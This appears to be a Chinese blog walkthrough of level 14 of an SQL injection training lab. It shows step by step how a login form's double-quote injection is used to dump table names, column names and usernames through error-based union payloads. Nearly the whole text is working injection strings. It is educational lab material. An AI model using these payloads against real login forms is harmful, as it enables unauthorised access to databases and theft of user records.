这里来到了第 14 关,题目是个忽悠,说是单引号+括号,整的跟 13 关一样但其实就是个大忽悠
在 Hackbar 上做注入,这一关 hackbar 又可以用了…这是属于哪波操作?
uname=admin'&passwd=111&submit=submit 回显正常[这时你就知道题目忽悠人了]
uname=admin"&passwd=111&submit=submit 回显报错[说明是双引号的人,没错了]
uname=admin"#&passwd=111&submit=submit 回显正常
猜测可控数列:
uname=admin" order by 3#&passwd=111&submit=submit
uname=admin" order by 2#&passwd=111&submit=submit
uname=admin" union select 1,2#&passwd=111&submit=submit
注:该报错类型的sql注入需要刷新,可能一两次并不会返回到需要的结果
–查表
uname=admin" union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))a from information_schema.tables group by a#&passwd=111&submit=submit
–查列
uname=admin" union select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand()*2))a from information_schema.tables group by a#&passwd=111&submit=submit
–查数据
uname=admin" union select count(*),concat((select username from users limit 0,1),floor(rand()*2))a from information_schema.tables group by a#&passwd=111&submit=submit
通过修改 limit 即可得到全部数据,在这里就不一一列举了
😄
478
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
